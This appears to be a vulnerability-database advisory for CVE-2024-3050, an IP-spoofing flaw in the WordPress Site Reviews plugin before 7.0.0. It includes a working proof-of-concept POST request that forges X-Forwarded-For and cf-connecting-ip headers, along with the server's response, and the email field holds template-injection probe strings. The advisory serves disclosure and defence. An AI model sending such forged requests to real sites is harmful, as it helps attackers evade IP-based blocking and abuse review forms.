Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
wpvulndbSławomir Zakrzewski, Maksymilian Kubiak (AFINE)WPVDB-ID:04C1581E-FD36-49D4-8463-B49915D4B1AC
HistoryMay 08, 2024 - 12:00 a.m.

Site Reviews < 7.0.0 - IP Spoofing

2024-05-0800:00:00
Sławomir Zakrzewski, Maksymilian Kubiak (AFINE)
wpscan.com
5
plugin
vulnerability
ip spoofing
headers
attacker
manipulate
bypass
blocking

AI Score

6.5

Confidence

High

EPSS

0

Percentile

9.0%

JSON

Description The plugin retrieves client IP addresses from potentially untrusted headers, allowing an attacker to manipulate its value. This may be used to bypass IP-based blocking

PoC

Request sent to the server to add review: POST /wordpress/wp-admin/admin-ajax.php HTTP/1.1 Host: localhost:8888 Content-Length: 2196 sec-ch-ua: “Chromium”;v=“121”, “Not A(Brand”;v=“99” Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1Y1QjmoN1k9aBC7F X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36 Accept: / Origin: http://localhost:8888 Referer: http://localhost:8888/wordpress/?page_id=594 Connection: close X-Forwarded-For: 99.99.99.99 cf-connecting-ip: 99.99.99.99 ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[_action]” submit-review ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[_nonce]” d94cadf7b1 ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[_post_id]” 594 ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[_referer]” ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[assigned_posts]” ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[assigned_terms]” ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[assigned_users]” ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[excluded]” ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[form_id]” glsr_2160fffb ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[terms_exist]” 1 ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[4e174f9d]” ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[rating]” 5 ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[title]” test ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[content]” test ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[name]” test ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[email]” szakrzewski+${55}${{66}}@afine.com ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“site-reviews[terms]” 1 ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“action” glsr_action ------WebKitFormBoundary1Y1QjmoN1k9aBC7F Content-Disposition: form-data; name=“_ajax_request” true ------WebKitFormBoundary1Y1QjmoN1k9aBC7F-- Response: HTTP/1.1 200 OK Server: nginx/1.19.2 Date: Thu, 22 Feb 2024 14:03:45 GMT Content-Type: application/json; charset=UTF-8 Connection: close X-Powered-By: PHP/7.4.33 X-Robots-Tag: noindex X-Content-Type-Options: nosniff Referrer-Policy: strict-origin-when-cross-origin X-Frame-Options: SAMEORIGIN Expires: Wed, 11 Jan 1984 05:00:00 GMT Cache-Control: no-cache, must-revalidate, max-age=0 Content-Length: 1706 {“success”:true,“data”:{“errors”:false,“html”:"

\n

test</h4></div>\n

\n Rated 5,0 out of 5</span>\n </span></span></span></span></span>\n</div></div>

2024-02-22</span></div>\n \n

test</p></div></div>\n

test</span></div> \n \n</div>“,“message”:“Your review has been submitted!”,“redirect”:”“,“review”:{“assigned_posts”:[],“assigned_terms”:[],“assigned_users”:[],“author”:“test”,“author_id”:0,“avatar”:“https://secure.gravatar.com/avatar?d=mm&s;=80”,“content”:“test”,“custom”:[],“date”:“2024-02-22 15:03:45”,“date_gmt”:“2024-02-22 14:03:45”,“email”:“szakrzewski+${55}${{66}}@afine.com”,“ID”:596,“ip_address”:“99.99.99.99”,“is_approved”:true,“is_modified”:false,“is_pinned”:false,“is_verified”:false,“rating”:5,“rating_id”:19,“response”:null,“score”:0,“status”:“publish”,“terms”:true,“title”:“test”,“type”:“local”,“url”:”“},“reviews”:”"}}

Related

nvd 1
cvelist 1
wpexploit 1
vulnrichment 1
cve 1
wordfence 1
nvd
nvd
CVE-2024-3050
2024-05-29 06:18:32
cvelist
cvelist
CVE-2024-3050 Site Reviews < 7.0.0 - IP Spoofing
2024-05-29 06:00:01
wpexploit
wpexploit
Site Reviews < 7.0.0 - IP Spoofing
2024-05-08 00:00:00
vulnrichment
vulnrichment
CVE-2024-3050 Site Reviews < 7.0.0 - IP Spoofing
2024-05-29 06:00:01
cve
cve
CVE-2024-3050
2024-05-29 06:18:32
wordfence
wordfence
Wordfence Intelligence Weekly WordPress Vulnerability Report (May 6, 2024 to May 12, 2024)
2024-05-16 13:04:14

AI Score

6.5

Confidence

High

EPSS

0

Percentile

9.0%

JSON
Related for WPVDB-ID:04C1581E-FD36-49D4-8463-B49915D4B1AC
nvd1cvelist1wpexploit1vulnrichment1cve1wordfence1